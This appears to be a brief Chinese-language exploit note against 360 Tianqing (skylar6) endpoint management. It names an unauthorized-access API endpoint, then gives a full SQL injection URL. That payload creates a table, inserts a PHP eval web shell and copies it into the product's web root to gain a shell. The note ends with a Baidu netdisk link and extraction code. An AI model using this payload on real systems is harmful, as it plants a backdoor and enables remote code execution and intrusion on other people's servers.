GET /api/dbstat/gettablessize
越权访问
/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:/Program Files (x86)/360/skylar6/www/1.php';drop table O;--
注入GETshell
链接: https://pan.baidu.com/s/1oDn7Qii0SfNq9Ie3IEneWw 提取码: rd4d 复制这段内容后打开百度网盘手机App,操作更方便哦